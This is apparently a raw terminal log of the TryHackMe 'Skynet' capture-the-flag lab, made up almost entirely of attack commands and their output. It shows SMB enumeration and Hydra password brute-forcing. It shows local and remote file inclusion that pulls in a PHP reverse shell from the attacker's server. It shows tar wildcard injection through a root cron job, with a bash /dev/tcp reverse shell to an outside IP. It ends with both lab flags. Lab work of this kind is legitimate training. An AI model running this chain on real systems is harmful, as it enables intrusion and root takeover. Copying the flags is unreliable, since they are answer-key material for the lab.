┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/TryHackMe/ && mkdir Skynet && Skynet
                                                                                                                   
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ nmap -sC -sV -Pn 10.10.118.97 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 19:40 EST
Nmap scan report for 10.10.118.97
Host is up (0.15s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp  open     pop3        Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES SASL PIPELINING TOP AUTH-RESP-CODE UIDL
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd
|_imap-capabilities: LITERAL+ SASL-IR LOGIN-REFERRALS more capabilities have ID LOGINDISABLEDA0001 post-login IDLE listed Pre-login IMAP4rev1 ENABLE OK
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
5811/tcp filtered unknown
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m21s, deviation: 3h27m51s, median: 20s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-12-19T00:41:30
|_  start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-12-18T18:41:30-06:00                                                                         
                                                                                                                   
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                     
Nmap done: 1 IP address (1 host up) scanned in 46.95 seconds     

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ smbclient -L 10.10.118.97
Enter WORKGROUP\kali's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ smbclient //10.10.118.97/anonymous
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 11:04:00 2020
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019

                9204224 blocks of size 1024. 5830780 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> tac attention.txt
tac: command not found
smb: \> more attention.txt
getting file \attention.txt of size 163 as /tmp/smbmore.bgbSWF (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
/tmp/smbmore.bgbSWF (END)


smb: \logs\> get log1.txt log2.txt log3.txt
getting file \logs\log1.txt of size 471 as log2.txt (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \logs\> more log1.txt
getting file \logs\log1.txt of size 471 as /tmp/smbmore.IMTDnG (0.7 KiloBytes/sec) (average 0.3 KiloBytes/sec)
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ gobuster dir -u http://10.10.118.97/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.118.97/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/18 19:42:48 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 312] [--> http://10.10.118.97/admin/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.118.97/css/]  
/js                   (Status: 301) [Size: 309] [--> http://10.10.118.97/js/]   
/config               (Status: 301) [Size: 313] [--> http://10.10.118.97/config/]
/ai                   (Status: 301) [Size: 309] [--> http://10.10.118.97/ai/]    
/squirrelmail         (Status: 301) [Size: 319] [--> http://10.10.118.97/squirrelmail/]
/server-status        (Status: 403) [Size: 277]  

===============================================================
2021/12/18 20:46:22 Finished
===============================================================


┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/TryHackMe/Skynet 
                                                                                                                  
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ ls
gobuster  log2.txt  nmap
                                                                                                                   
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ cat log2.txt                       
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator


> Go to http://10.10.118.97/squirrelmail

> Intercept login post request with BurpSuite

POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.118.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: http://10.10.118.97
Connection: close
Referer: http://10.10.118.97/squirrelmail/src/login.php
Cookie: SQMSESSID=126kjhmg44s48derfpsmlqm0h7
Upgrade-Insecure-Requests: 1

login_username=test&secretkey=test&js_autodetect_results=1&just_logged_in=1


> login_username=milesdyson&secretkey=§test§&js_autodetect_results=1&just_logged_in=1

> Payload log2.txt

> Filter by length or response to get cyborg007haloterminator as the password

> cyborg007haloterminator


┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ hydra -l milesdyson -P log2.txt 10.10.118.97 http-post-form "/squirrelmail/src/redirect.php:login_usernam=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."   
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-18 20:05:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.118.97:80/squirrelmail/src/redirect.php:login_usernam=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator219
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: cyborg007haloterminator
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator123!@#
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator143
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator1989
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator22596
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator20
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator1988
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator16
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator168
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator13
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator101
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator10
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator1056
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator02
[80][http-post-form] host: 10.10.118.97   login: milesdyson   password: terminator00
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-18 20:05:27


┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ smbclient -U milesdyson //10.10.118.97/milesdyson                                                          1 ⨯
Enter WORKGROUP\milesdyson's password: 
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \> ls
  .                                   D        0  Tue Sep 17 05:05:47 2019
  ..                                  D        0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 05:05:14 2019
  notes                               D        0  Tue Sep 17 05:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 05:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 05:05:14 2019

                9204224 blocks of size 1024. 5823032 blocks available
smb: \> cd notes
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 05:18:40 2019
  ..                                  D        0  Tue Sep 17 05:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 05:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 05:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 05:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 05:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 05:01:29 2019
  important.txt                       N      117  Tue Sep 17 05:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 05:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 05:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 05:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 05:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 05:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 05:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 05:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 05:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 05:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 05:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 05:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 05:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 05:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 05:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 05:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 05:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 05:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 05:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 05:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 05:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 05:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 05:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 05:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 05:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 05:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 05:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 05:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 05:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 05:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 05:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 05:01:29 2019

                9204224 blocks of size 1024. 5822948 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \notes\> 

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ cat important.txt 

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife


> /45kra24zxs28v3yd

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ curl -s http://10.10.118.97/45kra24zxs28v3yd            
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.118.97/45kra24zxs28v3yd/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.118.97 Port 80</address>
</body></html>
                                                                                                                   
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ curl -s http://10.10.118.97/45kra24zxs28v3yd/
<html>
<head>
<style>
body {
  color: white;
}
</style>
</head>
<body bgcolor="black">
<center><br />
<img src='miles.jpg'>
<h2>Miles Dyson Personal Page</h2><p>Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,<br /> a computer A.I. intended to control electronically linked weapons and defend the United States.</p>
</center>
</body>
</html>

┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ gobuster dir -u http://10.10.118.97/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt -o gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.118.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/18 20:14:04 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/administrator        (Status: 301) [Size: 337] [--> http://10.10.118.97/45kra24zxs28v3yd/administrator/]
/index.html           (Status: 200) [Size: 418]    
                                                                                       
===============================================================
2021/12/18 20:15:21 Finished
===============================================================







┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ curl -s http://10.10.118.97/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../etc/passwd
<script>
        function CloseDefaultAlert(){
                SetAlert(false, "", "#alert");
                setTimeout(function () {SetBlockade(false)}, 200);
        }
        function ShowAlert(){
                _width = '';
                _height = '';
                jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
                        function CompleteAnimation(){
                                jQuery("#btnClose_alert").css('visibility', "visible");
                                jQuery("#description_alert").css('visibility', "visible");
                                jQuery("#content_alert").css('visibility', "visible");
                        }
        }
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
    <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
        <div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
    <div class="separator" style="margin-bottom:15px;"></div>
    <div id="content_alert" class="content_alert">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>  


┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ cp ~/Documents/PrivEsc/php-reverse-shell-1.0/php-reverse-shell.php shell.php
                                                                                                                       
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.118.97 - - [18/Dec/2021 20:49:56] "GET /shell.php HTTP/1.0" 200 -

> Visit http://10.10.118.97/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.121.137:8000/shell.php

┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ nc -lvnp 4444    
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.118.97.
Ncat: Connection from 10.10.118.97:52472.
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 19:50:18 up  1:11,  0 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@skynet:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@skynet:/$ ls
ls
bin   home            lib64       opt   sbin  tmp      vmlinuz.old
boot  initrd.img      lost+found  proc  snap  usr
dev   initrd.img.old  media       root  srv   var
etc   lib             mnt         run   sys   vmlinuz
www-data@skynet:/$ cd home
cd home
www-data@skynet:/home$ ls
ls
milesdyson
www-data@skynet:/home$ cd milesdyson
cd milesdyson
www-data@skynet:/home/milesdyson$ ls
ls
backups  mail  share  user.txt
www-data@skynet:/home/milesdyson$ cat user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807
www-data@skynet:/home/milesdyson$ sudo -l
sudo -l
[sudo] password for www-data: cyborg007haloterminator

Sorry, try again.
[sudo] password for www-data: cyborg007haloterminator

Sorry, try again.
[sudo] password for www-data: find / -type f -user root -perm -4000 2> /dev/null

sudo: 3 incorrect password attempts
www-data@skynet:/home/milesdyson$ find / -type f -user root -perm -4000 2> /dev/null
<dyson$ find / -type f -user root -perm -4000 2> /dev/null                   
/sbin/mount.cifs
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
www-data@skynet:/home/milesdyson$ ls -la
ls -la
total 36
drwxr-xr-x 5 milesdyson milesdyson 4096 Sep 17  2019 .
drwxr-xr-x 3 root       root       4096 Sep 17  2019 ..
lrwxrwxrwx 1 root       root          9 Sep 17  2019 .bash_history -> /dev/null
-rw-r--r-- 1 milesdyson milesdyson  220 Sep 17  2019 .bash_logout
-rw-r--r-- 1 milesdyson milesdyson 3771 Sep 17  2019 .bashrc
-rw-r--r-- 1 milesdyson milesdyson  655 Sep 17  2019 .profile
drwxr-xr-x 2 root       root       4096 Sep 17  2019 backups
drwx------ 3 milesdyson milesdyson 4096 Sep 17  2019 mail
drwxr-xr-x 3 milesdyson milesdyson 4096 Sep 17  2019 share
-rw-r--r-- 1 milesdyson milesdyson   33 Sep 17  2019 user.txt
www-data@skynet:/home/milesdyson$ cd backups
cd backups
www-data@skynet:/home/milesdyson/backups$ ls -la
ls -la
total 4584
drwxr-xr-x 2 root       root          4096 Sep 17  2019 .
drwxr-xr-x 5 milesdyson milesdyson    4096 Sep 17  2019 ..
-rwxr-xr-x 1 root       root            74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root       root       4679680 Dec 18 19:55 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/$ printf '#!/bin/bash\nbash -i >& /dev/tcp/10.6.121.137/4445 0>&1' > /var/www/html/shell
<ev/tcp/10.6.121.137/4445 0>&1' > /var/www/html/shell                        
www-data@skynet:/$ chmod +x /var/www/html/shell
chmod +x /var/www/html/shell
www-data@skynet:/$ touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint=1
www-data@skynet:/$ touch /var/www/html/--checkpoint-action=exec=bash\ shell
touch /var/www/html/--checkpoint-action=exec=bash\ shell
www-data@skynet:/$ ls -l /var/www/html 
ls -l /var/www/html
total 64
-rw-rw-rw- 1 www-data www-data     0 Dec 18 20:23 --checkpoint-action=exec=bash shell
-rw-rw-rw- 1 www-data www-data     0 Dec 18 20:23 --checkpoint=1
drwxr-xr-x 3 www-data www-data  4096 Sep 17  2019 45kra24zxs28v3yd
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 admin
drwxr-xr-x 3 www-data www-data  4096 Sep 17  2019 ai
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 config
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 css
-rw-r--r-- 1 www-data www-data 25015 Sep 17  2019 image.png
-rw-r--r-- 1 www-data www-data   523 Sep 17  2019 index.html
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 js
-rwxrwxrwx 1 www-data www-data    54 Dec 18 20:22 shell
-rw-r--r-- 1 www-data www-data  2667 Sep 17  2019 style.css
www-data@skynet:/$ 



┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~/Documents/TryHackMe/Skynet]
└─$ nc -lvnp 4445
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.118.97.
Ncat: Connection from 10.10.118.97:41338.
bash: cannot set terminal process group (15472): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@skynet:/var/www/html# cd /root
cd /root
root@skynet:~# ls 
ls
root.txt
root@skynet:~# cat root.txt
cat root.txt
3f0372db24753accc7179a282cd6a949
